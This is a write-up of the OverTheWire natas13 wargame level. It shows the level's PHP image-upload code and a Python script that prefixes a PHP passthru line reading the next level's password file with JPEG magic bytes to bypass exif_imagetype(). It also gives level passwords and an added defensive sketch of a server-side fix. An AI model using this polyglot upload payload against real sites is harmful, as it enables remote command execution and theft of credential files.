OverTheWire’s natas13

Enes Aladağ
Nov 13, 2023


username: natas13
password: lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9

In this level, just like natas12, some kind of image upload page welcomes us. As always, we want to get a string for something (the password :D). When I check the source code I see:

<?php

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
        $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    $err=$_FILES['uploadedfile']['error'];
    if($err){
        if($err === 2){
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

This looks just like natas12, but with a bit more. This time it checks whether the file is an image or not with the exif_imagetype() function. After some quick research I found out that this function checks whether the file starts with ‘\xFF\xD8\xFF\xE0’ or not.
So this might help:

# Write only the JPEG magic bytes; the with-block closes the file
with open('natas13.jpeg', 'wb') as shell:
    shell.write(b'\xFF\xD8\xFF\xE0')

Yes, the exif_imagetype() function is bypassed.

So let's add some more, then turn it into ‘something.php’ just like we did for natas12.

# JPEG magic bytes followed by the PHP code that prints the next password
with open('natas13.jpeg', 'wb') as shell:
    shell.write(b'\xFF\xD8\xFF\xE0' + b"<?php passthru('cat /etc/natas_webpass/natas14');")

Uploaded, and it worked just like a new one.

pass for natas14: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP
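
Why the level's check was not enough, and one server-side fix, as an added example (not part of the original write-up or the level's code): the sketch models the level's logic, where the content is sniffed but the stored extension comes from the client-supplied filename, next to a variant that picks the extension from the detected type. All function names, the signature table and the sample bytes are assumptions made for this illustration.

```python
import secrets

# Leading signatures of the image types this sketch accepts (JPEG, PNG, GIF).
SIGNATURES = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png",
              b"GIF87a": "gif", b"GIF89a": "gif"}

def sniff_type(data):
    """Signature-only check on the first bytes, like the level's image test."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None

def jpeg_is_well_formed(data):
    """Simplified walk: SOI, length-prefixed segments up to SOS, EOI at the end."""
    if not data.startswith(b"\xff\xd8") or not data.endswith(b"\xff\xd9"):
        return False
    pos = 2
    while pos + 4 <= len(data):
        marker = data[pos + 1]
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if data[pos] != 0xFF or seg_len < 2 or pos + 2 + seg_len > len(data):
            return False
        if marker == 0xDA:  # start of scan: compressed image data follows
            return True
        pos += 2 + seg_len
    return False

def vulnerable_name(client_filename, data):
    """Model of the level: content is sniffed, but the extension is the client's."""
    if sniff_type(data) is None:
        return None
    ext = client_filename.rsplit(".", 1)[-1]
    return f"upload/{secrets.token_hex(5)}.{ext}"

def hardened_name(client_filename, data):
    """Extension is chosen from the detected type; client_filename is ignored."""
    ext = sniff_type(data)
    if ext is None or (ext == "jpg" and not jpeg_is_well_formed(data)):
        return None
    return f"upload/{secrets.token_hex(5)}.{ext}"

# Constructed samples: magic bytes followed by text, and a minimal segment layout.
FAKE = b"\xff\xd8\xff\xe0" + b"<?php /* placeholder */ ?>"
MINIMAL = b"\xff\xd8" + b"\xff\xe0\x00\x04AB" + b"\xff\xda\x00\x02" + b"\x00\xff\xd9"

if __name__ == "__main__":
    print(vulnerable_name("x.php", FAKE), hardened_name("x.php", FAKE),
          hardened_name("x.php", MINIMAL))
```

A well-formed JPEG can still carry arbitrary text in a comment segment, so the server-chosen extension is the control that matters here; the structure check only rejects the crudest files.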
